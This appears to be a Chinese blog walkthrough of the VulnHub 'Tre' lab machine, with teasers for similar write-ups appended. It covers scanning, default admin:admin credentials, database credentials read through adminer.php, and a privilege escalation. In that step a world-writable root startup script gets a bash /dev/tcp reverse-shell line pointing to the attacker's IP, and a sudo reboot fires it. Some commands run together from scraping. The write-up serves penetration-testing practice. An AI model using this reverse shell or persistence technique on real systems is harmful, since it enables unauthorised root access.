VulnHub Tre

2023-10-25 20:13
文章标签 vulnhub tre

本文主要是介绍VulnHub Tre,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一、信息收集

1.nmap扫描

发现开发端口:22、80、8082

访问80和8082端口,没有发现什么有价值的信息

2.扫描目录

dirsearch扫描目录
┌──(root💀kali)-[~/routing/dirsearch-]
└─# python3 dirsearch.py -u "http://192.168.103.186"

1./adminer.php

2./info.php

3./system

nikto扫描
┌──(root💀kali)-[~/桌面]
└─# nikto -h http://192.168.103.186/在/system/目录里面,找到:账号密码
admin:admin

3./system目录登录

开始利用nikto扫描,发现账号密码都是admin

登录后,发现这个web页面

返回数据包

在响应数据包中的这条就是用来验证身份的。

Authorization: Basic YWRtaW46YWRtaW4=

信息收集

/mantisbt/config/a.txt目录下,可疑找到以下信息:

4.登陆/adminer.php网页:

登陆成功:

可以看到mysql服务器中的数据表:

mantis_user_table
账号:tre
密码:Tr3@123456A!

二、漏洞利用

1.ssh连接tre

账号:tre
密码:Tr3@123456A!

2.SUID提权

没有看到什么有价值的提权方法

1.查看只有SUID的二进制可执行文件
find / -user root -perm -4000 -print 2>/dev/null2.已知的可用来提权的linux可行性的文件列表如下:
nmap、Vim、find、bash、more、less、Nano、cp

3.sudo提权

1.发现tre用户可以通过sudo使用shutdown命令,从而控制靶机启动

然后键入下面的命令来查看:属主是root,但同时其他用户可以对该文件进行写的敏感文件。排除/sys/kernel/security这样的关于内核的文件,将目标重点放在/usr/bin/check-system这个文件上

find / -type f -perm -o=w -user root -ls 2>/dev/null | grep -v "/proc\|sys/fs"

2.这个脚本是root创建,所以很有可能会有root的相关程序对其进行引用

/usr/bin/check-system目录说明

不难发现两个程序都是通过bash来执行这个脚本的,而这且都是开机自启动。结合前面搜集的信息:

  • tre用户可以读写check-system
  • 可以重启靶机
  • check-system开机是会运行。

所以对该脚本进行修改,让其在重启是反弹shell。而且由于开机是高权限,大概率是root用户的shell

/usr/bin/check-system

cat /usr/bin/check-systemvim.tiny /usr/bin/check-system  #使用vim.tiny编辑/bin/bash -i >& /dev/tcp/192.168.103.129/4444 0>&1

root权限

利用sudo shutdown使靶机重启,进而成功的反弹rootshell,拿下root

sudo shutdown -r now

这篇关于VulnHub Tre的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/284910

相关文章

解决code ERESOLVE,pm ERR! ERESOLVE unable to resolve dependency tre问题

目录 一、错误原因二、解决方法 一、错误原因 “npm ERR! code ERESOLVE” 错误通常发生在执行 npm install 或者 npm ci 命令时,表示在解析依赖时发生了问题。可能的原因包括: 依赖版本冲突:不同依赖包要求使用相同的包的不同版本,导致冲突。 依赖解析问题:npm 无法正确解析依赖包的版本。 二、解决方法 要解决 “npm ERR! cod

Vulnhub靶场 | DC系列 - DC9

文章目录 DC-9环境搭建渗透测试端口敲门服务 DC-9 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀k

vulnhub靶场-DC2

一、环境配置 1.下载地址:https://www.vulnhub.com/entry/dc-2,311/ 2.靶场配置:Nat模式   更改hosts文件,官网提示需要更改hosts文件才能访问到网站,否则访问不了 kali进入编辑模式vim,添加上自己的靶机ip地址保存即可 vim /etc/hosts 3.攻击机:kali ip:192.168.111.12

Vulnhub靶场 | DC系列 - DC8

文章目录 DC-8环境搭建渗透测试 DC-8 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/

Vulnhub靶场 | DC系列 - DC7

文章目录 DC-7环境搭建渗透测试 DC-7 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/

Vulnhub靶场 | DC系列 - DC4

文章目录 DC-4环境搭建渗透测试 DC-4 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-4,313/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/

Vulnhub靶场 | DC系列 - DC-3

文章目录 DC-3环境搭建渗透测试 DC-3 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-32,312/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~

Vulnhub--OS-HACKNOS-2.1

渗透复现 目标站点为wordpress,通过wpscan进行漏洞扫描发现漏洞插件 通过漏洞插件存在的目录穿越漏洞成功读取/etc/passwd文件中flag用户的密码 SSH登录flag用户后在备份文件中找到rohit用户的密码 切换rohit用户,rohit用户能够以root权限执行任何文件,随后进行sudo su提权 知识扩展 wpsacn扫描wordpress站点 以root权

[Vulnhub] Sleepy JDWP+Tomcat+Reverse+Reverse-enginnering

信息收集 Server IP AddressPorts Opening192.168.8.100TCP:21,8009,9001 $ nmap -sV -sC 192.168.8.100 -p- --min-rate 1000 -Pn Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-20 05:06 EDTNmap scan repor

[Vulnhub] BrainPan BOF缓冲区溢出+Man权限提升

信息收集 Server IP AddressPorts Open192.168.8.105TCP: $ nmap -p- 192.168.8.105 -sC -sV -Pn --min-rate 1000 Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-10 04:20 EDTNmap scan report for 192.168.8